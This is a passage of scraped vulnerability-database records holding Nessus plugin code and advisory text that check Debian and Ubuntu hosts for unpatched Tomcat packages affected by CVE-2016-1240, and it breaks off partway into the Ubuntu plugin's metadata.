NOTE: Tenable Network Security has extracted the preceding description

block directly from the DLA security advisory. Tenable has attempted

to automatically clean and format it as much as possible without

introducing additional issues.\"

);

# http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Es

script_set_attribute(

attribute:\"see_also\",

value:\"http://www.nessus.org/u?c0b304c1\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00015.html\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://packages.debian.org/source/wheezy/tomcat6\"

);

script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");

script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");

script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");

script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");

script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");

script_set_attribute(attribute:\"exploit_available\", value:\"true\");



script_set_attribute(attribute:\"plugin_type\", value:\"local\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.4-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.5-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.5-java-doc\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat6-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-admin\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-common\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-docs\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-examples\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-extras\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-user\");

script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");



script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");

script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");

script_end_attributes();



script_category(ACT_GATHER_INFO);

script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");

script_family(english:\"Debian Local Security Checks\");



script_dependencies(\"ssh_get_info.nasl\");

script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");



exit(0);

}





include(\"audit.inc\");

include(\"debian_package.inc\");





if (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

if (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");

if (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);





flag = 0;

if (deb_check(release:\"7.0\", prefix:\"libservlet2.4-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"libservlet2.5-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"libservlet2.5-java-doc\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"libtomcat6-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-admin\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-common\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-docs\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-examples\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-extras\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-user\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;



if (flag)

{

if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());

else security_hole(0);

exit(0);

}

else audit(AUDIT_HOST_NOT, \"affected\");

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T06:07:32", "description": "Dawid Golunski discovered that the Tomcat init script incorrectly

handled creating log files. A remote attacker could possibly use this

issue to obtain root privileges. (CVE-2016-1240)



This update also reverts a change in behaviour introduced in

USN-3024-1 by setting mapperContextRootRedirectEnabled to True by

default.



Note that Tenable Network Security has extracted the preceding

description block directly from the Ubuntu security advisory. Tenable

has attempted to automatically clean and format it as much as possible

without introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-20T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:tomcat6", "p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java", "p-cpe:/a:canonical:ubuntu_linux:tomcat8", "p-cpe:/a:canonical:ubuntu_linux:libtomcat7-java", "p-cpe:/a:canonical:ubuntu_linux:tomcat7", "p-cpe:/a:canonical:ubuntu_linux:libtomcat6-java", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3081-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93600", "sourceData": "#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Ubuntu Security Notice USN-3081-1. The text

# itself is copyright (C) Canonical, Inc. See

# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered

# trademark of Canonical, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93600);

script_version(\"2.8\");

script_cvs_date(\"Date: 2019/09/18 12:31:46\");



script_cve_id(\"CVE-2016-1240\");

script_xref(name:\"USN\", value:\"3081-1\");



script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)\");

script_summary(english:\"Checks dpkg output for updated packages.\");



script_set_attribute(

attribute:\"synopsis\",

value:

\"The remote Ubuntu host is missing one or more security-related

patches.\